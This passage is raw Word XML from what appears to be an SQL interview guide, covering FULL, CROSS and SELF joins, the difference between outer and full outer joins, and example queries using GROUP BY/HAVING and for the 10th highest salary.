    <w:p w14:paraId="49F8659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FULL JOIN (or FULL OUTER JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E4D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JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns all rows when there is a match in either the left table or the right table. It returns NULL for non-matching rows from both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D262E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include all records from both tables, even if there's no match between them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F283C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59AC1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D06DBC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B2B428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45A3327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and all departments will be returned, and where there is no match, the missing table's fields will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D302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CROSS JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D0B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CROSS JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns the Cartesian product of two tables, meaning it will return all possible combinations of rows from both tables. This join does not require any condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418CCB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get all possible combinations of two sets of data, such as when testing or generating all combinations of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5162A3D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033A4D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name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684818C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30ECA05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OSS JOIN Department d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CF9C4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will return every possible combination of employee names and department names, regardless of whether the employee belongs to that department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AAD02B"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SELF JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F00D7F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SELF JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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relate rows within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B55E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FA44A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1.emp_name AS Employee, e2.emp_name AS Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532858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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0381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Employee e2 ON e1.manager_id = e2.emp_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD50C3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the employee table is joined with itself to find out who is managing each employee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141B0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77"/>
        <w:gridCol w:w="3892"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="4A3B716F" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3016826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Join Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A945A0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scription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="584E2DA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tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="11CED4F6" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="657B878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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F0AA4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only matching rows between the tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666027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data that exists in both tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="280D878B" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46CCAD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JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="353708F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left table and matching rows from the right table, or NULL if no match.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5F09F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left table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="3D1AA771" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A15B84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JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E4BAB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right table and matching rows from the left table, or NULL if no match.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5807C4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right table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="580E7689" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="429670B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JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="207008E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when there is a match in either the left or right table, or NULL for non-matches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05137F7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both tables, even if no match exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="6378AC56" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DE6525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OSS JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F1B50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the Cartesian product of the two tables, i.e., all possible combinations of rows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EBA13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all combinations of data from two tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="12C367FB" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="277853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F JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E20BF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ins a table with itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="594DA51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dealing with hierarchical or relational data within a table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D78CE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Each type of join has its own use case depending on the data and the type of relationship you want to retrieve. Understanding these different types of joins helps in writing more efficient SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C38E75" w14:textId="7E4561C1"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3239" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBA9B9" w14:textId="1F4D82C5" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="00421182">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="780" w:name="_Toc197867994"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Outer join and Full outer join</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="780"/>
    </w:p>
    <w:p w14:paraId="1098D610" w14:textId="4492AB5A" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085E" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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 between Outer Join and Full Outer Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258D0B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Outer Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C7ED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The term </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Outer Join</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a broad concept that refers to joins where one table can have unmatched rows and these unmatched rows from one or both tables are returned with NULL values in the result set. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>three types</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of outer joins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC0694"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LEFT JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385463D"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xml:space="preserve"> (RIGHT JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE47059"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FULL JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6C62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e term "outer join" is often used when discussing either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s. When someone says "outer join," they typically mean a join that includes non-matching rows from one or both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD5689"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Outer Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D8370"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Returns all rows from the left table and the matching rows from the right table. If there's no match, NULL values are returned for columns of the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB825F8"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Returns all rows from the right table and the matching rows from the left table. If there's no match, NULL values are returned for columns of the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9583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Returns all rows when there is a match in either the left table or the right table. Non-matching rows from both tables will have NULL values for the columns of the other table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E16D7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Full Outer Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4431EE4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is a specific type of outer join that returns </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rows from both the left and the right tables. Where there is no match, NULL values are returned for the columns of the table without a match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E4D5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is join is used when you want to get </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all records</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from both tables, whether there is a match or not. It combines the results of a </w:t>
      </w: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and a </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503ADE7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 Consider the following query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7695A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9595BD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424943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0A5768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081"/>
        <w:gridCol w:w="5269"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="49B83DCF" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A459388"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39A34C"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uter Join</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303A5AC0"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ull Outer Join</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="4924928F" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C2801A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65D4E44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fers to any type of outer join (LEFT, RIGHT, or FULL).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3347160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specific type of outer join that returns all rows from both tables, with NULLs where no match exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="567F81C3" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B17628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es Unmatched Rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B2A8736"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but only for the side specified (LEFT or RIGHT).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59922418"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for both tables (LEFT and RIGHT).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="66C1BAB2" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A1F5E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04634D2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OUTER JOIN, RIGHT OUTER JOIN, FULL OUTER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7093877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only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="37AADC34" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31243B4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turned Rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5602A28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pends on whether LEFT, RIGHT, or FULL is used.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E21F46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both tables, with NULLs for non-matching rows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30CE923B" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="00CE4B95" w:rsidRDefault="0022085E"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 xml:space="preserve">In summary, when someone refers to an "Outer Join," they could be talking about a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 but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specifically refers to the join type that returns all rows from both tables, including unmatched rows from both sides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66AAC6" w14:textId="08CFB17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3240" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DD656" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="00CE4B95" w:rsidRDefault="0022085E" w:rsidP="0022085E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="781" w:name="_Toc197867995"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Query - To find the name of a city which has more than one customer in it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="781"/>
    </w:p>
    <w:p w14:paraId="15E46907" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="00CE4B95" w:rsidRDefault="0022085E" w:rsidP="0022085E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example: Customer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769DE57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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227901B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city?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15539F7B" w14:textId="2B098627" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085E" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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 find the name of a city that has more than one customer in it, you can use the following SQL query with a GROUP BY and HAVING clause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419DE44"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Customer_city</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70B37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Customer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A1B121"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GROUP BY Customer_city</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0314EAC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VING COUNT(Customer_name) &gt; 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E7E39"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13BD2C9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GROUP BY Customer_city</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Groups the customers by their city.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63C20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UNT(Customer_name)</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Counts the number of customers in each city.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D17F42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AVING COUNT(Customer_name) &gt; 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Filters the groups, returning only those cities where there is more than one customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFDE23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the names of cities where there are more than one customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C5F6C" w14:textId="7D9B9D8A"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3241" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4271048E" w14:textId="71C23C44" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="00766AAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="782" w:name="_Toc197867996"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="006151B2"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6151B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10th highest salary of employee</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="782"/>
    </w:p>
    <w:p w14:paraId="7DCAD287" w14:textId="6413A5A0" w:rsidR="006151B2" w:rsidRPr="005C1C9E" w:rsidRDefault="006151B2" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C11B4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MIN(emp_sal) AS 10th_highest_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FB1E7"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3598DF95"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DISTINCT emp_sal</w:t>
      </w:r>
